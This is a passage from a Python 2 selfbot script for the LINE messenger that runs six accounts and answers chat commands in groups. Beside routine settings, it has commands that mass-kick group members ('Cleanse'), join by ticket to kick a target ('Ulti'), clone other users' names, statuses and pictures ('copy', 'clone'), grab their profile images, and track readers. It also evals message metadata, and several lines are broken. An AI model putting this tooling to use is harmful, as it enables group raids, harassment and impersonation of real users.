cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
elif msg.text in ["Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
#========================================
#========================================
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif "Message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message:","")
cl.sendText(msg.to,"bot message\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Add message:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["Comment:on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Comment:off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Check comment"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message comment\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#-------------------------------------------------------
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 9
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg,g)
#===========================================
elif msg.text.lower() == 'responsename':
if msg.from_ in admin:
profile = cl.getProfile()
text = profile.displayName + " "
cl.sendText(msg.to, text)
profile = ki.getProfile()
text = profile.displayName + " "
ki.sendText(msg.to, text)
profile = kk.getProfile()
text = profile.displayName + " "
kk.sendText(msg.to, text)
profile = kc.getProfile()
text = profile.displayName + " "
kc.sendText(msg.to, text)
profile = ks.getProfile()
text = profile.displayName + " "
ks.sendText(msg.to, text)
profile = kt.getProfile()
text = profile.displayName + ""
kt.sendText(msg.to, text)
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "Cc: " in msg.text:
n = msg.text.replace("Cc: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
elif "copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy1 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy1 @","")
_nametarget = _name.rstrip(' ')
gs = kk.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kk.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kk.CloneContactProfile(target)
kk.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy2 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy2 @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki.CloneContactProfile(target)
ki.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy3 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy3 @","")
_nametarget = _name.rstrip(' ')
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kc.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kc.CloneContactProfile(target)
kc.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy4 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy4 @","")
_nametarget = _name.rstrip(' ')
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ks.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ks.CloneContactProfile(target)
ks.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy5 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy5 @","")
_nametarget = _name.rstrip(' ')
gs = kt.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kt.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kt.CloneContactProfile(target)
kt.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Backup","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
ki.CloneContactProfile(target)
kk.CloneContactProfile(target)
kc.CloneContactProfile(target)
ks.CloneContactProfile(target)
kt.CloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["Kembali ke asli"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
kk.updateDisplayPicture(backup.pictureStatus)
kk.updateProfile(backup)
kc.updateDisplayPicture(backup.pictureStatus)
kc.updateProfile(backup)
ks.updateDisplayPicture(backup.pictureStatus)
ks.updateProfile(backup)
kt.updateDisplayPicture(backup.pictureStatus)
kt.updateProfile(backup)
cl.sendText(msg.to, "Backup Astro Sukses")
except Exception as e:
cl.sendText(msg.to, str (e))
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Blacklist all" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Blacklist all","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Semua Telah Di Hapus")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Maaf")
else:
for target in targets:
if not target in Bots:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sentText(msg.to,"Berhasil Dihapus")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/DetailsGroup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,(error))#-------------------------------------------------------
#--------------------------------------------------------
elif "Ban group: " in msg.text:
grp = msg.text.replace("Ban group: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == grp:
wait["BlGroup"][i]=True
cl.sendText(msg.to, "Success Ban Group : "+grp)
else:
pass
else:
cl.sendText(msg.to, "Khusus Creator")
#--------------------------------------------------------
elif msg.text in ["List ban","List ban group"]:
if msg.from_ in admin:
if wait["BlGroup"] == {}:
ki.sendText(msg.to,"nothing")
kk.sendText(msg.to,"nothing")
kc.sendText(msg.to,"nothing")
else:
mc = ""
for gid in wait["BlGroup"]:
mc += "-> " +cl.getGroup(gid).name + "\n"
ki.sendText(msg.to,"===[Ban Group]===\n"+mc)
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif msg.text in ["Del ban: "]:
if msg.from_ in admin:
ng = msg.text.replace("Del ban: ","")
for gid in wait["BlGroup"]:
if cl.getGroup(gid).name == ng:
del wait["BlGroup"][gid]
cl.sendText(msg.to, "Success del ban "+ng)
else:
pass
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Join group: " in msg.text:
ng = msg.text.replace("Join group: ","")
gid = cl.getGroupIdsJoined()
try:
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.inviteIntoGroup(i,[Creator])
cl.sendText(msg.to,"Success join to ["+ h +"] group")
else:
pass
else:
cl.sendText(msg.to,"Khusus Creator")
except Exception as e:
cl.sendMessage(msg.to, str(e))
#--------------------------------------------------------
elif "Leave group: " in msg.text:
ng = msg.text.replace("Leave group: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendText(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendText(msg.to,"Success left ["+ h +"] group")
else:
pass
else:
cl.sendText(msg.to,"Khusus Creator")
elif "Set member: " in msg.text:
if msg.from_ in admin:
jml = msg.text.replace("Set member: ","")
wait["Members"] = int(jml)
cl.sendText(msg.to, "Jumlah minimal member telah di set : "+jml)
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Add all" in msg.text:
if msg.from_ in admin:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
elif "Ulti " in msg.text:
if msg.from_ in admin:
ulti0 = msg.text.replace("Ulti ","")
ulti1 = ulti0.rstrip()
ulti2 = ulti1.replace("@","")
ulti3 = ulti2.rstrip()
_name = ulti3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
nl.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets ==[]:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
nl.kickoutFromGroup(msg.to,[target])
nl.leaveGroup(msg.to)
print (msg.to,[g.mid])
except:
nl.sendText(msg.t,"Ter ELIMINASI....")
nl.sendText(msg.to,"WOLES brooo....!!!")
nl.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.uldateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
print("Speed")
start = time.time()
cl.sendText(msg.to, "loading.....")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
kt.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = kt.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
kt.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kt.getContact(target)
X = contact.displayName
profile = kt.getProfile()
profile.displayName = X
kt.updateProfile(profile)
kt.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kt.getProfile()
lol.statusMessage = Y
kt.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kt.updateProfilePicture(P)
except Exception as e:
kt.sendText(msg.to, "Failed!")
print e
#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = kt.getProfile()
profile.displayName = x
kt.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
kt.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
kt.updateProfilePicture(p)
kt.sendText(msg.to, "Succes")
except Exception as e:
kt.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Lurking":
if msg.from_ in admin:
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Lurking result":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "anda slah ketik-_-")
#========================================
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,kt]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#================================================
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
